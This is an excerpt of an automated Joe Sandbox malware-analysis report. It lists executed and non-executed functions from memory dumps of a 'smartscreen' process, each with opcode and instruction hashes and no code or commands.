                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d0c56066550d757522a52e750fe3ee80060adea2f79f1db79aee0e0eba10879f
                                                              • Instruction ID: 81bf50c654cd24b27a995bf6671ecae742a87be41c7811ccc62d50d32240710c
                                                              • Opcode Fuzzy Hash: d0c56066550d757522a52e750fe3ee80060adea2f79f1db79aee0e0eba10879f
                                                              • Instruction Fuzzy Hash: EE017C35A0E3898FD702EB74C95529D7FB0EF42310F1985FBC444DB2A6D6386A49CB91
                                                              Function 00007FFD9B774D19 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction ID: 1bb962deeb14cf36554cb10f096cabc2f812983b255037d7337b7c943c0b3dd7
                                                              • Opcode Fuzzy Hash: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction Fuzzy Hash: C6011730A1961E8EEB34EA54D8A47F972A1FF54711F1101BDD44ED31B2EAAC2B818A00
                                                              Function 00007FFD9BB15559 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc5de9907b59a19dcb8e818d47e4a42be98891abc62fac8f1570d5e465664dfd
                                                              • Instruction ID: 6f70a02078fdf0efb55497adda7770a01cfca35b003a5b184be9ce54516b164f
                                                              • Opcode Fuzzy Hash: cc5de9907b59a19dcb8e818d47e4a42be98891abc62fac8f1570d5e465664dfd
                                                              • Instruction Fuzzy Hash: B1F0E520709B484FC719562D68680617BF1DB6A11234A03DB9445C72B3ED14DC898341
                                                              Function 00007FFD9B770C50 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88df1c30e7c65ba13ae2ba0a2de176403cadffe88642e6b34b456114b677af9c
                                                              • Instruction ID: cc1a6c05beef1966e70791602587812ea0c8d8d4484b8b6acda5a820acb69c9e
                                                              • Opcode Fuzzy Hash: 88df1c30e7c65ba13ae2ba0a2de176403cadffe88642e6b34b456114b677af9c
                                                              • Instruction Fuzzy Hash: 1E016234A0E3898FD702DB74C55469D7FF0DF02314F1945EAC444DB1A7D6386A44C751
                                                              Function 00007FFD9B774DA0 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: bc5106bc9176e6cbf8f1fa44b79322c28e75117006f4ce5d632416c643657289
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: 49F0363070971D4AEB74EA44E8B4AB93391EF54710F1112B9D94EC71F3EE9C6B454604
                                                              Function 00007FFD9B774B77 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8201d6fec7fd2d47f2d75092ba91f3ca1a0548db4fd762578ffc515b8e199cee
                                                              • Instruction ID: ab002cb5360e2de3cd8f9833391b1ca918fd929166903bfaa17a23428d6f8ecf
                                                              • Opcode Fuzzy Hash: 8201d6fec7fd2d47f2d75092ba91f3ca1a0548db4fd762578ffc515b8e199cee
                                                              • Instruction Fuzzy Hash: 8CE04867F0DA1D8EF6A4D95814753BC61D1DF68750F0603BAD40EC32F2ED582D414781
                                                              Function 00007FFD9B773276 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction ID: dc0a48ae012d3b4c2078c12dca50c35738c16706a88f301ed8c18307fe6b375d
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: 03E0ED70B0D61E46FBA49544C8A07B97254EB94700F1501B8D58EE33E1DDB8AF848B45
                                                              Function 00007FFD9BB18899 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4912947880727a3d7bda8338e856f71c254f047fa62c9ee66c83487efeecaf5
                                                              • Instruction ID: abe160f6f3394359a24da4be55122030c6d016def6287fbd73bbff49d261a8cc
                                                              • Opcode Fuzzy Hash: c4912947880727a3d7bda8338e856f71c254f047fa62c9ee66c83487efeecaf5
                                                              • Instruction Fuzzy Hash: FAE0463154E7C08FCB0B9B3488A88903F70EE1721138A41EAC049CF1B3DA2E894AC701
                                                              Function 00007FFD9B770B9D Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction ID: cf0f6ce9c36b9e94d43a439457835291d0878140296cc44fe155b765fe1583d3
                                                              • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction Fuzzy Hash: 96C0123062990E8FDA40BB28C8C9C24BBA0FB0F201BDA01E0E00CC71B1D6A9A8908700
                                                              Function 00007FFD9B7706AD Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction ID: 9ddbce249de62fb093078826382c2e605aff8d978f00ee6d355e27f068012d05
                                                              • Opcode Fuzzy Hash: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction Fuzzy Hash: BFC00205F5B79F01E86571AA54B60ADB540DBC4A24FA21672D50D821B1988E22950156
                                                              Function 00007FFD9B7712B8 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction ID: d59fd26fb34404143d2ccbb15ba044cb61d378b07478c4393886f130cb9dc0d5
                                                              • Opcode Fuzzy Hash: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction Fuzzy Hash: 89C08C3061180C8FC908FB28C88480433A0FB09200BC200A0E00AC7170D259DCC0C740
                                                              Function 00007FFD9B7754F9 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 080ecba70d5fd6b5c77834faf8bd001eeaec03d172d28987d19b9090b4359ae6
                                                              • Instruction ID: 871832d6867547cb6436c1debcd07735ae0e5183bca700d3d103d03b244504e1
                                                              • Opcode Fuzzy Hash: 080ecba70d5fd6b5c77834faf8bd001eeaec03d172d28987d19b9090b4359ae6
                                                              • Instruction Fuzzy Hash: 51C08C00F18C1E46F21A6B14443013D04428B80704F8A40B0E41EC37DECC1DAF0202C6
                                                              Function 00007FFD9B7706D0 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction ID: 56be003d52b021bc40a908088ac8bbb3eb7731e931180a1b3739a91d43bdd97c
                                                              • Opcode Fuzzy Hash: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction Fuzzy Hash: 39B01200E5B54F00E82431FB08E6064B440DB84104FF20670E40C412F198CD12940242

                                                              Non-executed Functions

                                                              Function 00007FFD9B7709B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: b5be86cc126c3c1959a39bc2213d6b7028424e475cec1ab9578e093778edaf1a
                                                              • Instruction ID: 6b0e4a292c7763f170153521e85d7398887e8dbbf4a299f7f7165b83c36d2a95
                                                              • Opcode Fuzzy Hash: b5be86cc126c3c1959a39bc2213d6b7028424e475cec1ab9578e093778edaf1a
                                                              • Instruction Fuzzy Hash: 7A51E20BB9D5264EE32933FC75619FD6B85CFA0379B0842B7F15E890D74E48608187E5

                                                              Executed Functions

                                                              Function 00007FFD9B760C25 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.2223775148.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd9b760000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 3e1e3e091fa2299551eb1bf84fdccc06e58fce9408b19a4c3297854147df4760
                                                              • Instruction ID: 023c2525dfb5506bdb7499ea2805908cbd8cbf88e8429f02760ff8b8274beccc
                                                              • Opcode Fuzzy Hash: 3e1e3e091fa2299551eb1bf84fdccc06e58fce9408b19a4c3297854147df4760
                                                              • Instruction Fuzzy Hash: 2721F336A0D78D8FE712DB74C8501DC7BA0EF42325F0546B7C044CB1E6E634264AC792
                                                              Function 00007FFD9B760C38 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.2223775148.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd9b760000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 50f83bd627c7795aaf684152213202895a195651f69b49a1b7fa27557f406907
                                                              • Instruction ID: cefd56cb6300d30f73e76aca4a2b397b6d198fa328206a3d9776807151ce9784
                                                              • Opcode Fuzzy Hash: 50f83bd627c7795aaf684152213202895a195651f69b49a1b7fa27557f406907
                                                              • Instruction Fuzzy Hash: 2E11A025A0D78D8FE702DB74C8602D97FA0AF42315F0645B7C084DB1E6E63826498791
                                                              Function 00007FFD9B760C40 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.2223775148.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd9b760000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 2a93d0d2d26a02e33d966b15b6ac80203e8169ed7ef98caa94ca17caecd675e3
                                                              • Instruction ID: 1703f2a8bea6d902c2caa78ca0948ee0793783b0c9012229b2794096c9c8cbc0
                                                              • Opcode Fuzzy Hash: 2a93d0d2d26a02e33d966b15b6ac80203e8169ed7ef98caa94ca17caecd675e3
                                                              • Instruction Fuzzy Hash: 7301AD35A097898FE702DB74C8606D97FB0AF42314F0645F7C084DB2A6E6382A48CB91
                                                              Function 00007FFD9B760C48 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.2223775148.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd9b760000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 92df1abe79a005ec21fbf4e6a8ee6a0c1740863e53bd2229cd0a2cd755ea5dae
                                                              • Instruction ID: 09e1b808a860389daa07806921a03c75a603fd76565346bc86e6550428f709af
                                                              • Opcode Fuzzy Hash: 92df1abe79a005ec21fbf4e6a8ee6a0c1740863e53bd2229cd0a2cd755ea5dae
                                                              • Instruction Fuzzy Hash: E001B135A0D7898FD702DB74C8506DD7FF0AF02314F0541E7D040DB2A6E6386A48CB91
                                                              Function 00007FFD9B760C50 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.2223775148.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd9b760000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 45d36604149e4939c2752f4f34ffaf94c8c01d45cafaf46e815bdfcaaef72f35
                                                              • Instruction ID: 3fba8d4b67bb7d0115771815d19520ffc3406303d3978068f4b8a94069d1b1d0
                                                              • Opcode Fuzzy Hash: 45d36604149e4939c2752f4f34ffaf94c8c01d45cafaf46e815bdfcaaef72f35
                                                              • Instruction Fuzzy Hash: 32018F34A1D7898FE702DBB4C85469D7FF0AF02314F1542E6D444DB2AAEA386A48C741
                                                              Function 00007FFD9B760960 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000002B.00000002.2223775148.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_43_2_7ffd9b760000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b809ec4fc076dfe1d844642880643dc72a95d60d9509a9361df635f5abb8033
                                                              • Instruction ID: 70e504b3a71c830782aea02410418f007204ad0c493196cf2b3fe1496de9a9b7
                                                              • Opcode Fuzzy Hash: 1b809ec4fc076dfe1d844642880643dc72a95d60d9509a9361df635f5abb8033
                                                              • Instruction Fuzzy Hash: 83312E21B1DA1D4FE758B76C646AAF973C2DF58361B1401BAE40EC32FBDD18AC414285